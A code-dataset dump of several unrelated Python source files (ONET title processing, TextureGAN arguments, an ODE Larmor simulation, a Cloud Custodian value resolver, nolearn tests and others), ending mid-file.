id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
203312 | """Process ONET job titles into a common format"""
import pandas as pd
from skills_ml.algorithms.nlp import transforms, lowercase_strip_punc
class Onet_Title(object):
"""An object representing job title data from different ONET files
Originally written by <NAME>
"""
def __init__(self, onet_cache):
"""
Args:
onet_cache: an object that is able to fetch ONET files by name
"""
self.onet_cache = onet_cache
self.occupation = {}
self.occupation['name'] = 'Occupation Data.txt'
self.occupation['fields'] = ['O*NET-SOC Code', 'Title']
self.alternative = {}
self.alternative['name'] = 'Alternate Titles.txt'
self.alternative['fields'] = ['O*NET-SOC Code', 'Alternate Title']
self.sample = {}
self.sample['name'] = 'Sample of Reported Titles.txt'
self.sample['fields'] = ['O*NET-SOC Code', 'Reported Job Title']
def extract(self, name, columns):
"""
Args:
name: unpathed filename of an ONET file ('Occupation Data.txt')
columns: a list of columns to extract from the file
"""
with self.onet_cache.ensure_file(name) as full_path:
return pd.read_csv(full_path, delimiter='\t')[columns]
class OnetTitleExtractor(object):
"""
An object that creates a job titles CSV based on ONET data
"""
def __init__(self, output_filename, onet_source, hash_function):
"""
Args:
output_filename: A filename to write the final dataset
onet_source: An object that is able to fetch ONET files by name
hash_function: A function that can hash a given string
"""
self.output_filename = output_filename
self.onet_source = onet_source
self.hash_function = hash_function
def run(self):
"""
Creates a job titles CSV based on ONET occupation and title data
"""
titles = Onet_Title(self.onet_source)
# TODO: Get descriptions, original title
onet_titles = titles.extract(titles.occupation['name'],
titles.occupation['fields'])
alternative_titles = titles.extract(titles.alternative['name'],
titles.alternative['fields'])
sample_titles = titles.extract(titles.sample['name'],
titles.sample['fields'])
alternative_titles.columns = onet_titles.columns
sample_titles.columns = onet_titles.columns
job_titles = pd.concat(
(onet_titles, alternative_titles, sample_titles)
)
unique_titles = titles.extract(
titles.occupation['name'],
titles.occupation['fields'] + ['Description']
).drop_duplicates()
unique_titles.columns = [
'O*NET-SOC Code',
'Original Title',
'Description'
]
unique_titles['job_uuid'] = unique_titles['Original Title']\
.apply(self.hash_function)
titles_complete = pd.merge(job_titles,
unique_titles,
how='left',
on=['O*NET-SOC Code'])
titles_complete[transforms[0]] = titles_complete['Title']\
.apply(lowercase_strip_punc)
titles_complete.to_csv(self.output_filename, sep='\t')
| StarcoderdataPython |
11243017 | <filename>tests/config/should_ignore_ext.py
print('Should not get loaded by figura!')
# functions in figura files are supposed to raise an error ("Config construct of unsupported type")
def should_not_get_loaded():
pass
| StarcoderdataPython |
3506075 | import unittest
from unittest.mock import Mock, patch
from nuplan.common.actor_state.scene_object import SceneObject, SceneObjectMetadata
class TestSceneObject(unittest.TestCase):
"""Tests SceneObject class"""
@patch("nuplan.common.actor_state.tracked_objects_types.TrackedObjectType")
@patch("nuplan.common.actor_state.oriented_box.OrientedBox")
def test_initialization(self, mock_box: Mock, mock_tracked_object_type: Mock) -> None:
"""Tests that agents can be initialized correctly"""
scene_object = SceneObject(mock_tracked_object_type, mock_box, SceneObjectMetadata(1, "123", 1, "456"))
self.assertEqual("123", scene_object.token)
self.assertEqual("456", scene_object.track_token)
self.assertEqual(mock_box, scene_object.box)
self.assertEqual(mock_tracked_object_type, scene_object.tracked_object_type)
@patch("nuplan.common.actor_state.scene_object.StateSE2")
@patch("nuplan.common.actor_state.scene_object.OrientedBox")
@patch("nuplan.common.actor_state.scene_object.TrackedObjectType")
@patch("nuplan.common.actor_state.scene_object.SceneObject.__init__")
def test_construction(self, mock_init: Mock, mock_type: Mock, mock_box_object: Mock, mock_state: Mock) -> None:
"""Test that agents can be constructed correctly."""
mock_init.return_value = None
mock_box = Mock()
mock_box_object.return_value = mock_box
_ = SceneObject.from_raw_params("123", "123", 1, 1, mock_state, size=(3, 2, 1))
mock_box_object.assert_called_with(mock_state, width=3, length=2, height=1)
mock_init.assert_called_with(
metadata=SceneObjectMetadata(token="<PASSWORD>", track_token="<PASSWORD>", timestamp_us=1, track_id=1),
tracked_object_type=mock_type.GENERIC_OBJECT,
oriented_box=mock_box,
)
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
5100523 | import argparse
def parse_arguments(*args):
parser = argparse.ArgumentParser()
###############added options#######################################
parser.add_argument('-lr', '--learning_rate', default=1e-3, type=float,
help='Learning rate for the generator')
parser.add_argument('-lrd', '--learning_rate_D', default=1e-4, type=float,
help='Learning rate for the discriminator')
parser.add_argument('-lrd_l', '--learning_rate_D_local', default=1e-4, type=float,
help='Learning rate for the discriminator')
parser.add_argument('--gan', default='lsgan', type=str, choices=['dcgan', 'lsgan', 'wgan', 'improved wgan'],
help='dcgan|lsgan|wgan|improved wgan') # todo wgan/improved wgan
parser.add_argument('--model', default='scribbler', type=str, choices=['scribbler', 'texturegan', 'pix2pix','scribbler_dilate_128'],
help='scribbler|pix2pix')
parser.add_argument('--num_epoch', default=100, type=int,
help='texture|scribbler')
parser.add_argument('--visualize_every', default=10, type=int,
help='no. iteration to visualize the results')
# all the weights ratio, might wanna make them sum to one
parser.add_argument('--feature_weight', default=0, type=float,
help='weight ratio for feature loss')
parser.add_argument('--global_pixel_weight_l', default=0, type=float,
help='weight ratio for pixel loss for l channel')
parser.add_argument('--local_pixel_weight_l', default=1, type=float,
help='pixel weight for local loss patch')
parser.add_argument('--pixel_weight_ab', default=0, type=float,
help='weight ratio for pixel loss for ab channel')
parser.add_argument('--pixel_weight_rgb', default=0, type=float,
help='weight ratio for pixel loss for ab channel')
parser.add_argument('--discriminator_weight', default=0, type=float,
help='weight ratio for the discriminator loss')
parser.add_argument('--discriminator_local_weight', default=0, type=float,
help='weight ratio for the discriminator loss')
parser.add_argument('--style_weight', default=0, type=float,
help='weight ratio for the texture loss')
# parser.add_argument('--gpu', default=[0], type=int, nargs='+',
# help='List of GPU IDs to use') # TODO support cpu
parser.add_argument('--gpu', default=1, type=int, help="GPU ID")
parser.add_argument('--display_port', default=7779, type=int,
help='port for displaying on visdom (need to match with visdom currently open port)')
parser.add_argument('--data_path', default='/home/psangkloy3/training_handbags_pretrain/', type=str,
help='path to the data directory, expect train_skg, train_img, val_skg, val_img')
parser.add_argument('--save_dir', default='/home/psangkloy3/test/', type=str,
help='path to save the model')
parser.add_argument('--load_dir', default='/home/psangkloy3/test/', type=str,
help='path to save the model')
parser.add_argument('--save_every', default=1000, type=int,
help='no. iteration to save the models')
parser.add_argument('--load_epoch', default=-1, type=int,
help="The epoch number for the model to load")
parser.add_argument('--load', default=-1, type=int,
help='load generator and discrminator from iteration n')
parser.add_argument('--load_D', default=-1, type=int,
help='load discriminator from iteration n, priority over load')
parser.add_argument('--image_size', default=128, type=int,
help='Training images size, after cropping')
parser.add_argument('--resize_to', default=300, type=int,
help='Training images size, after cropping')
parser.add_argument('--resize_max', default=1, type=float,
help='max resize, ratio of the original image, max value is 1')
parser.add_argument('--resize_min', default=0.6, type=float,
help='min resize, ratio of the original image, min value 0')
parser.add_argument('--patch_size_min', default=20, type=int,
help='minumum texture patch size')
parser.add_argument('--patch_size_max', default=40, type=int,
help='max texture patch size')
parser.add_argument('--batch_size', default=32, type=int, help="Training batch size. MUST BE EVEN NUMBER")
parser.add_argument('--num_input_texture_patch', default=2,type=int)
parser.add_argument('--num_local_texture_patch', default=1,type=int)
parser.add_argument('--color_space', default='lab', type=str, choices=['lab', 'rgb'],
help='lab|rgb')
parser.add_argument('--threshold_D_max', default=0.8, type=int,
help='stop updating D when accuracy is over max')
parser.add_argument('--content_layers', default='relu4_2', type=str,
help='Layer to attach content loss.')
parser.add_argument('--style_layers', default='relu3_2, relu4_2', type=str,
help='Layer to attach content loss.')
parser.add_argument('--use_segmentation_patch', default=True, type=bool,
help='whether or not to inject noise into the network')
parser.add_argument('--input_texture_patch', default='dtd_texture', type=str,
choices=['original_image', 'dtd_texture'],
help='whether or not to inject noise into the network')
parser.add_argument('--loss_texture', default='dtd_texture', type=str,
choices=['original_image', 'dtd_texture'],
help='where is the texture loss come from')
parser.add_argument('--local_texture_size', default=50, type=int,
help='use local texture loss instead of global, set -1 to use global')
parser.add_argument('--texture_discrminator_loss', default=True, type=bool,
help='adding discrminator for texture')
############################################################################
############################################################################
############Not Currently Using #################################################################
parser.add_argument('--tv_weight', default=1, type=float,
help='weight ratio for total variation loss')
parser.add_argument('--mode', default='texture', type=str, choices=['texture', 'scribbler'],
help='texture|scribbler')
parser.add_argument('--visualize_mode', default='train', type=str, choices=['train', 'test'],
help='train|test')
parser.add_argument('--crop', default='random', type=str, choices=['random', 'center'],
help='random|center')
parser.add_argument('--contrast', default=True, type=bool,
help='randomly adjusting contrast on sketch')
parser.add_argument('--occlude', default=False, type=bool,
help='randomly occlude part of the sketch')
parser.add_argument('--checkpoints_path', default='data/', type=str,
help='output directory for results and models')
parser.add_argument('--noise_gen', default=False, type=bool,
help='whether or not to inject noise into the network')
parser.add_argument('--absolute_load', default='', type=str,
help='load saved generator model from absolute location')
##################################################################################################################################
return parser.parse_args(*args)
| StarcoderdataPython |
6515130 | def dfs(adjacency_list, current_vertex, visited, result_stack):
visited[current_vertex] = True
for neighbour_vertex in adjacency_list[current_vertex]:
if not visited[neighbour_vertex]:
dfs(adjacency_list, neighbour_vertex, visited, result_stack)
result_stack.append(current_vertex)
# this algo works on directed acyclic graphs i.e DAGs
def topo_sort(adjacency_list, no_of_vertices):
visited = [False] * no_of_vertices
result_stack = []
for i in range(no_of_vertices):
if not visited[i]:
dfs(adjacency_list, i, visited, result_stack)
result_stack.reverse()
return result_stack
adjacency_list = []
no_of_vertices = int(input())
for i in range(no_of_vertices):
adjacency_list.append([int(v) for v in input().split()])
result = topo_sort(adjacency_list, no_of_vertices)
print(result)
"""
6
3
1
0 1
0 2
""" | StarcoderdataPython |
4957488 |
from typing import cast
from logging import Logger
from logging import getLogger
from unittest import TestSuite
from unittest import main as unitTestMain
from tests.TestBase import TestBase
# import the class you want to test here
from metamenus.Configuration import Configuration
class TestConfiguration(TestBase):
"""
"""
clsLogger: Logger = cast(Logger, None)
@classmethod
def setUpClass(cls):
TestBase.setUpLogging()
TestConfiguration.clsLogger = getLogger(__name__)
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
self.logger: Logger = TestConfiguration.clsLogger
self._configuration: Configuration = Configuration()
def tearDown(self):
pass
def testDefaultIndentation(self):
expectedIndentation: str = Configuration.DEFAULT_INDENTATION
actualIndentation: str = self._configuration.indentation
self.assertEqual(expectedIndentation, actualIndentation, 'Default indentation has changed')
def testDefaultMenuBarPrefix(self):
expectedPrefix: str = Configuration.DEFAULT_MENU_BAR_PREFIX
actualPrefix: str = self._configuration.menuBarPrefix
self.assertEqual(expectedPrefix, actualPrefix, 'Default menu bar method prefix has changed')
def testDefaultMenuPrefix(self):
expectedPrefix: str = Configuration.DEFAULT_MENU_PREFIX
actualPrefix: str = self._configuration.menuPrefix
self.assertEqual(expectedPrefix, actualPrefix, 'Default menu method prefix has changed')
def testDefaultVerboseWarnings(self):
expectedValue: bool = Configuration.DEFAULT_VERBOSE_WARNINGS
actualValue: bool = self._configuration.verboseWarnings
self.assertEqual(expectedValue, actualValue, 'Verbosity default has changed')
def suite() -> TestSuite:
"""You need to change the name of the test class here also."""
import unittest
testSuite: TestSuite = TestSuite()
# noinspection PyUnresolvedReferences
testSuite.addTest(unittest.makeSuite(TestConfiguration))
return testSuite
if __name__ == '__main__':
unitTestMain()
| StarcoderdataPython |
1625467 | <gh_stars>1-10
import ode
import numpy as np
import matplotlib.pyplot as plt
qe = 1.60217662e-19
me = 9.10938356e-31
B0 = 0.1
# RHS of the ODE problem, dy/dx = f(x,y)
def fun(t,y):
vx = y[3]
vy = y[4]
vz = y[5]
# Charge-to-mass ratio (q/m)
qm = -qe/me
# E-field [V/m]
Ex = 0.0
Ey = 0.0
Ez = 0.0
# B-field [T]
Bx = 0.0
By = 0.0
Bz = B0
# Newton-Lorentz equation (in Cartesian Coords)
ax = qm * Ex + qm*( Bz*vy - By*vz )
ay = qm * Ey + qm*( Bx*vz - Bz*vx )
az = qm * Ez + qm*( By*vx - Bx*vy )
ydot = np.array(( vx, vy, vz, ax, ay, az ))
return ydot
def main():
# Initial velocity [m/s]
vy0 = 1.0e6
# Larmor pulsation [rad/s]
w_L = qe/me * B0
# Larmor period [s]
tau_L = 2.0*np.pi/w_L
# Larmor radius [m]
r_L = vy0/w_L
# Initial conditions
y0 = np.array(( r_L, 0.0, 0.0, 0.0, vy0, 0.0 ))
# Time Grid
N_gyroperiods = 100
N_points_per_gyroperiod = 10
time_rk = np.linspace( 0.0, N_gyroperiods*tau_L, N_gyroperiods*N_points_per_gyroperiod )
# Runge-Kutta 4
y_rk = ode.rk4( fun, time_rk, y0 )
# Amplitude (orbit radius)
r_rk = np.sqrt( y_rk[:,0]**2 + y_rk[:,1]**2 )
# Plot 1 - Trajectory
plt.figure(1)
plt.plot( y_rk[:,0]/r_L, y_rk[:,1]/r_L, 'b-', label='Runge-Kutta (4th)' )
plt.axis('equal')
plt.xlabel('x [r_L]')
plt.ylabel('y [r_L]')
plt.title(str(N_gyroperiods)+' Larmor Gyrations, '+str(N_points_per_gyroperiod)+' points/gyroperiod')
plt.legend(loc=3)
plt.savefig('ex04_ode_larmor_long_trajectory.png')
# Plot 2 - Amplitude percent error
plt.figure(2)
plt.plot( time_rk/tau_L, ode.error_percent( r_L, r_rk), 'bx', label='Runge-Kutta (4th)' )
plt.xlabel('time / tau_Larmor')
plt.ylabel('Percent Amplitude error [%]')
plt.title('Percent Amplitude Error over '+str(N_gyroperiods)+' Larmor gyrations')
plt.legend(loc=2)
plt.savefig('ex04_ode_larmor_long_error.png')
plt.show()
if __name__ == '__main__':
main()
| StarcoderdataPython |
255901 | <filename>python/week1/euro.py
PRICES = [0.01, 0.02, 0.05, 0.10, 0.20, 0.50, 1, 2]
QUESTIONS = [
"Voer het aantal 1 centen in:\n",
"Voer het aantal 2 centen in: \n",
"Voer het aantal 5 centen in: \n",
"Voer het aantal 10 centen in: \n",
"Voer het aantal 20 centen in: \n",
"Voer het aantal 50 centen in: \n",
"Voer het aantal 1 euro's in: \n",
"Voer het aantal 2 euro's in: \n"
]
if __name__ == '__main__':
munten = [int(input(question)) for question in QUESTIONS]
aantal_munten = sum(munten)
totale_waarde = sum(quantity * value for (quantity, value) in zip(munten, PRICES))
print("Totaal aantal munten: {}".format(aantal_munten))
print("Totale waarde van de munten: {} euro".format(totale_waarde)) | StarcoderdataPython |
3436988 | #Ler o preço de um produto e calculá-lo com 5% de desconto
preco = float(input("Digite o valor do produto: R$"));
desc = (preco/100) * 5;
novopreco = preco - desc;
prazo= preco + (preco/100*8);
#Cálculo do produto à prazo com 8% de acréscimo;
print(f"O produto custava R${preco:.2f}, agora com desconto passou a custar R${novopreco:.2f}.");
print(f"Já à prazo, o valor do produto passa a ser R${prazo:.2f}.");
| StarcoderdataPython |
1689753 | <filename>c7n/resolver.py
# Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
import csv
import io
import json
import logging
import itertools
from urllib.request import Request, urlopen
from urllib.parse import parse_qsl, urlparse
import zlib
from contextlib import closing
import jmespath
from c7n.utils import format_string_values
log = logging.getLogger('custodian.resolver')
ZIP_OR_GZIP_HEADER_DETECT = zlib.MAX_WBITS | 32
class URIResolver:
def __init__(self, session_factory, cache):
self.session_factory = session_factory
self.cache = cache
def resolve(self, uri):
if self.cache:
contents = self.cache.get(("uri-resolver", uri))
if contents is not None:
return contents
if uri.startswith('s3://'):
contents = self.get_s3_uri(uri)
else:
# TODO: in the case of file: content and untrusted
# third parties, uri would need sanitization
req = Request(uri, headers={"Accept-Encoding": "gzip"})
with closing(urlopen(req)) as response:
contents = self.handle_response_encoding(response)
if self.cache:
self.cache.save(("uri-resolver", uri), contents)
return contents
def handle_response_encoding(self, response):
if response.info().get('Content-Encoding') != 'gzip':
return response.read().decode('utf-8')
data = zlib.decompress(response.read(),
ZIP_OR_GZIP_HEADER_DETECT).decode('utf8')
return data
def get_s3_uri(self, uri):
parsed = urlparse(uri)
client = self.session_factory().client('s3')
params = dict(
Bucket=parsed.netloc,
Key=parsed.path[1:])
if parsed.query:
params.update(dict(parse_qsl(parsed.query)))
result = client.get_object(**params)
body = result['Body'].read()
if isinstance(body, str):
return body
else:
return body.decode('utf-8')
class ValuesFrom:
"""Retrieve values from a url.
Supports json, csv and line delimited text files and expressions
to retrieve a subset of values.
Expression syntax
- on json, a jmespath expr is evaluated
- on csv, an integer column or jmespath expr can be specified
- on csv2dict, a jmespath expr (the csv is parsed into a dictionary where
the keys are the headers and the values are the remaining columns)
Text files are expected to be line delimited values.
Examples::
value_from:
url: s3://bucket/xyz/foo.json
expr: [].AppId
value_from:
url: http://foobar.com/mydata
format: json
expr: Region."us-east-1"[].ImageId
value_from:
url: s3://bucket/abc/foo.csv
format: csv2dict
expr: key[1]
# inferred from extension
format: [json, csv, csv2dict, txt]
"""
supported_formats = ('json', 'txt', 'csv', 'csv2dict')
# intent is that callers embed this schema
schema = {
'type': 'object',
'additionalProperties': 'False',
'required': ['url'],
'properties': {
'url': {'type': 'string'},
'format': {'enum': ['csv', 'json', 'txt', 'csv2dict']},
'expr': {'oneOf': [
{'type': 'integer'},
{'type': 'string'}]}
}
}
def __init__(self, data, manager, event=None, value=None):
config_args = {
'account_id': manager.config.account_id,
'region': manager.config.region
}
self.data = format_string_values(data, **config_args)
self.manager = manager
self.event = event
self.value = value
self.cache = manager._cache
self.resolver = URIResolver(manager.session_factory, manager._cache)
def get_contents(self):
_, format = os.path.splitext(self.data['url'])
if not format or self.data.get('format'):
format = self.data.get('format', '')
else:
format = format[1:]
if format not in self.supported_formats:
raise ValueError(
"Unsupported format %s for url %s",
format, self.data['url'])
contents = str(self.resolver.resolve(self.data['url']))
return contents, format
def get_values(self):
if self.cache:
# use these values as a key to cache the result so if we have
# the same filter happening across many resources, we can reuse
# the results.
key = [self.data.get(i) for i in ('url', 'format', 'expr')]
contents = self.cache.get(("value-from", key))
if contents is not None:
return contents
contents = self._get_values()
if self.cache:
self.cache.save(("value-from", key), contents)
return contents
def _get_values(self):
contents, format = self.get_contents()
if format == 'json':
data = json.loads(contents)
if 'expr' in self.data:
expr = None
# this event is the event passed into the lambda. Slightly different than the CloudTrail event.
if self.event:
try:
try:
# Remove the account portion from the arn
self.event['detail']['userIdentity']['arn'] = self.event['detail']['userIdentity']['arn'].split(':')[5]
except Exception as e:
# Failed to simplify the arn so keep it
# This might happen on the second or later iterations
log.debug(f"Failed to parse arn: {self.event['detail']['userIdentity']['arn']}")
pass
expr = self.data['expr'].format(**self.event)
log.debug(f"Expression after substitution: {expr}")
except KeyError as e:
log.error(f"Failed substituting into expression: {str(e)}")
expr = self.data['expr']
else:
expr = self.data['expr']
res = jmespath.search(expr, data)
log.debug(f"JMESPath result: {res}")
# Checking for whitelist expiration
if res is not None:
valid_until = res.get('validUntil', None)
value = res.get('value', None)
# If value AND valid_until are both not None, then we assume this is whitelisting
# However, if only one of them returns, we assume this isn't whitelisting and return
# the value. This allows for other jmespath expressions to be used besides just
# for whitelisting. Hopefully future proofing this part.
if value is None or valid_until is None or value == "" or valid_until == "":
log.warning(f"Value is: {value}, ValidUntil is: {valid_until}")
log.debug("Returning res since this might not be whitelisting...")
return res
else:
# If we made it here, we assume we are wanting to do whitelisting and need
# to check the expiration time to see if it's valid
import datetime
import time
current_time = datetime.datetime.fromtimestamp(time.time())
expiration = datetime.datetime.fromtimestamp(int(valid_until))
log.debug(f"Current Time: {current_time}, Expiration: {expiration}")
if current_time > expiration:
log.warning(f"Whitelist has expired, returning None...")
return None
else:
log.debug("Whitelist is valid")
if value == "*":
log.debug(f"Value is *... Returning value: {self.value}")
return self.value
return value
else:
log.warning(f"ValueFrom filter: {expr} key returned None")
return res
elif format == 'csv' or format == 'csv2dict':
data = csv.reader(io.StringIO(contents))
if format == 'csv2dict':
data = {x[0]: list(x[1:]) for x in zip(*data)}
if 'expr' in self.data:
return self._get_resource_values(data)
else:
combined_data = set(itertools.chain.from_iterable(data.values()))
return combined_data
else:
if isinstance(self.data.get('expr'), int):
return set([d[self.data['expr']] for d in data])
data = list(data)
if 'expr' in self.data:
if self.event:
try:
expr = self.data['expr'].format(**self.event)
log.debug('Expression after substitution: %s' % expr)
except KeyError as e:
log.error('Failed substituting into expression: %s' % str(e))
expr = self.data['expr']
else:
expr = self.data['expr']
return self._get_resource_values(expr, data)
else:
expr = self.data['expr']
res = jmespath.search(expr, data)
if res is None:
log.warning('ValueFrom filter: %s key returned None' % self.data['expr'])
return res
else:
combined_data = set(itertools.chain.from_iterable(data))
return combined_data
elif format == 'txt':
return set([s.strip() for s in io.StringIO(contents).readlines()])
def _get_resource_values(self, data):
res = jmespath.search(self.data['expr'], data)
if res is None:
log.warning(f"ValueFrom filter: {self.data['expr']} key returned None")
if isinstance(res, list):
res = set(res)
return res
| StarcoderdataPython |
1636051 | <filename>mex11.py
#!/usr/bin/env python3.6 # used in Unix/Linux OS
import sys
def print_uniq_lines(file_list):
print('file_list: ', file_list, type(file_list))
all_lines = set()
#print('file_list: ', file_list, type(file_list))
for f in file_list:
all_lines |= set(f.readlines())
print("".join(all_lines))
if len(sys.argv) > 1:
print_uniq_lines(open(f) for f in sys.argv[1:])
else:
print_uniq_lines([sys.stdin]) # stdin, stdout, stderr - These streams are regular text files like those returned by open().
# sys.stdin, sys.stdout, sys.stderr:
# https://docs.python.org/3/library/sys.html?highlight=stdin#sys.stdin
| StarcoderdataPython |
6488409 | <gh_stars>0
"""Helper functions to create backbone model."""
# Copyright (C) 2020 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions
# and limitations under the License.
import math
import FrEIA.framework as Ff
import FrEIA.modules as Fm
import torch
from FrEIA.framework.sequence_inn import SequenceINN
from torch import nn
def subnet_conv1(dims_in: int, dims_out: int):
"""1x1 conv subnetwork to predicts the affine coefficients.
Args:
dims_in (int): input dimensions
dims_out (int): output dimensions
Returns:
nn.Sequential: Feed-forward subnetwork
"""
kernel_size = 1
return nn.Sequential(
nn.Conv2d(dims_in, 2 * dims_in, kernel_size=kernel_size),
nn.ReLU(),
nn.Conv2d(2 * dims_in, dims_out, kernel_size=kernel_size)
)
def subnet_conv3(dims_in: int, dims_out: int):
"""3x3 conv subnetwork to predicts the affine coefficients.
Args:
dims_in (int): input dimensions
dims_out (int): output dimensions
Returns:
nn.Sequential: Feed-forward subnetwork
"""
kernel_size = 3
return nn.Sequential(
nn.Conv2d(dims_in, 2 * dims_in, kernel_size=kernel_size, padding=1),
nn.ReLU(),
nn.Conv2d(2 * dims_in, dims_out, kernel_size=kernel_size, padding=1)
)
def fastflow_head(condition_vector: int, coupling_blocks: int, clamp_alpha: float, n_features: int, dim) -> SequenceINN:
"""Create invertible decoder network.
Args:
condition_vector (int): length of the condition vector
coupling_blocks (int): number of coupling blocks to build the decoder
clamp_alpha (float): clamping value to avoid exploding values
n_features (int): number of decoder features
Returns:
SequenceINN: decoder network block
"""
coder = Ff.SequenceINN(n_features, dim, dim)
print("CNF coder:", n_features)
for _ in range(coupling_blocks):
coder.append(
Fm.PermuteRandom
)
coder.append(
Fm.AllInOneBlock,
subnet_constructor=subnet_conv3,
affine_clamping=clamp_alpha,
global_affine_type="SOFTPLUS",
)
coder.append(
Fm.AllInOneBlock,
subnet_constructor=subnet_conv1,
affine_clamping=clamp_alpha,
global_affine_type="SOFTPLUS",
)
return coder
| StarcoderdataPython |
6705170 | import pickle
from lasagne.layers import ConcatLayer
from lasagne.layers import DenseLayer
from lasagne.layers import InputLayer
from lasagne.layers import Layer
from lasagne.nonlinearities import identity
from lasagne.nonlinearities import softmax
from lasagne.objectives import categorical_crossentropy
from lasagne.updates import nesterov_momentum
from mock import Mock
from mock import patch
import numpy as np
import pytest
from sklearn.base import clone
from sklearn.datasets import make_classification
from sklearn.datasets import make_regression
from sklearn.grid_search import GridSearchCV
from sklearn.metrics import accuracy_score
from sklearn.metrics import mean_absolute_error
import theano
import theano.tensor as T
floatX = theano.config.floatX
class TestLayers:
@pytest.fixture
def layers(self):
from nolearn.lasagne.base import Layers
return Layers([('one', 1), ('two', 2), ('three', 3)])
def test_getitem_with_key(self, layers):
assert layers['one'] == 1
def test_getitem_with_index(self, layers):
assert layers[0] == 1
def test_getitem_with_slice(self, layers):
from nolearn.lasagne.base import Layers
sliced = layers[:2]
assert isinstance(sliced, Layers)
assert sliced.keys() == ['one', 'two']
assert sliced.values() == [1, 2]
def test_keys_returns_list(self, layers):
assert layers.keys() == ['one', 'two', 'three']
def test_values_returns_list(self, layers):
assert layers.values() == [1, 2, 3]
class TestFunctionalToy:
def classif(self, NeuralNet, X, y):
l = InputLayer(shape=(None, X.shape[1]))
l = DenseLayer(l, num_units=len(np.unique(y)), nonlinearity=softmax)
net = NeuralNet(l, update_learning_rate=0.01)
return net.fit(X, y)
def regr(self, NeuralNet, X, y):
l = InputLayer(shape=(None, X.shape[1]))
l = DenseLayer(l, num_units=y.shape[1], nonlinearity=None)
net = NeuralNet(l, regression=True, update_learning_rate=0.01)
return net.fit(X, y)
def test_classif_two_classes(self, NeuralNet):
X, y = make_classification()
X = X.astype(floatX)
y = y.astype(np.int32)
self.classif(NeuralNet, X, y)
def test_classif_ten_classes(self, NeuralNet):
X, y = make_classification(n_classes=10, n_informative=10)
X = X.astype(floatX)
y = y.astype(np.int32)
self.classif(NeuralNet, X, y)
def test_regr_one_target(self, NeuralNet):
X, y = make_regression()
X = X.astype(floatX)
y = y.reshape(-1, 1).astype(np.float32)
self.regr(NeuralNet, X, y)
def test_regr_ten_targets(self, NeuralNet):
X, y = make_regression(n_targets=10)
X = X.astype(floatX)
y = y.astype(floatX)
self.regr(NeuralNet, X, y)
class TestFunctionalMNIST:
def test_accuracy(self, net_fitted, mnist, y_pred):
X, y = mnist
y_test = y[60000:]
assert accuracy_score(y_pred, y_test) > 0.85
def test_train_history(self, net_fitted):
history = net_fitted.train_history_
assert len(history) == 2 # due to early stopping
assert history[1]['valid_accuracy'] > 0.85
assert history[1]['valid_accuracy'] > history[0]['valid_accuracy']
assert set(history[0].keys()) == set([
'dur', 'epoch', 'train_loss', 'train_loss_best',
'valid_loss', 'valid_loss_best', 'valid_accuracy',
])
def test_early_stopping(self, net_fitted):
early_stopping = net_fitted.on_epoch_finished[0]
assert early_stopping.train_history == net_fitted.train_history_
def test_pickle(self, net_fitted, X_test, y_pred):
pickled = pickle.dumps(net_fitted, -1)
net_loaded = pickle.loads(pickled)
assert np.array_equal(net_loaded.predict(X_test), y_pred)
def test_load_params_from_net(self, net, net_fitted, X_test, y_pred):
net_loaded = clone(net)
net_loaded.load_params_from(net_fitted)
assert np.array_equal(net_loaded.predict(X_test), y_pred)
def test_load_params_from_params_values(self, net, net_fitted,
X_test, y_pred):
net_loaded = clone(net)
net_loaded.load_params_from(net_fitted.get_all_params_values())
assert np.array_equal(net_loaded.predict(X_test), y_pred)
def test_save_params_to_path(self, net_fitted, X_test, y_pred):
path = '/tmp/test_lasagne_functional_mnist.params'
net_fitted.save_params_to(path)
net_loaded = clone(net_fitted)
net_loaded.load_params_from(path)
assert np.array_equal(net_loaded.predict(X_test), y_pred)
def test_load_params_from_message(self, net, net_fitted, capsys):
net2 = clone(net)
net2.verbose = 1
net2.load_params_from(net_fitted)
out = capsys.readouterr()[0]
message = """\
Loaded parameters to layer 'conv1' (shape 8x1x5x5).
Loaded parameters to layer 'conv1' (shape 8).
Loaded parameters to layer 'conv2' (shape 8x8x5x5).
Loaded parameters to layer 'conv2' (shape 8).
Loaded parameters to layer 'hidden1' (shape 128x128).
Loaded parameters to layer 'hidden1' (shape 128).
Loaded parameters to layer 'output' (shape 128x10).
Loaded parameters to layer 'output' (shape 10).
"""
assert out == message
def test_partial_fit(self, net, X_train, y_train):
net2 = clone(net)
assert net2.partial_fit(X_train, y_train) is net2
net2.partial_fit(X_train, y_train)
history = net2.train_history_
assert len(history) == 2
assert history[1]['valid_accuracy'] > 0.85
def test_lasagne_functional_grid_search(mnist, monkeypatch):
# Make sure that we can satisfy the grid search interface.
from nolearn.lasagne import NeuralNet
nn = NeuralNet(
layers=[],
)
param_grid = {
'more_params': [{'hidden_num_units': 100}, {'hidden_num_units': 200}],
'update_momentum': [0.9, 0.98],
}
X, y = mnist
vars_hist = []
def fit(self, X, y):
vars_hist.append(vars(self).copy())
return self
with patch.object(NeuralNet, 'fit', autospec=True) as mock_fit:
mock_fit.side_effect = fit
with patch('nolearn.lasagne.NeuralNet.score') as score:
score.return_value = 0.3
gs = GridSearchCV(nn, param_grid, cv=2, refit=False, verbose=4)
gs.fit(X, y)
assert [entry['update_momentum'] for entry in vars_hist] == [
0.9, 0.9, 0.98, 0.98] * 2
assert [entry['more_params'] for entry in vars_hist] == (
[{'hidden_num_units': 100}] * 4 +
[{'hidden_num_units': 200}] * 4
)
def test_clone():
from nolearn.lasagne import NeuralNet
from nolearn.lasagne import BatchIterator
from nolearn.lasagne import objective
params = dict(
layers=[
('input', InputLayer),
('hidden', DenseLayer),
('output', DenseLayer),
],
input_shape=(100, 784),
output_num_units=10,
output_nonlinearity=softmax,
more_params={
'hidden_num_units': 100,
},
update=nesterov_momentum,
update_learning_rate=0.01,
update_momentum=0.9,
regression=False,
objective=objective,
objective_loss_function=categorical_crossentropy,
batch_iterator_train=BatchIterator(batch_size=100),
y_tensor_type=T.ivector,
use_label_encoder=False,
on_epoch_finished=None,
on_training_finished=None,
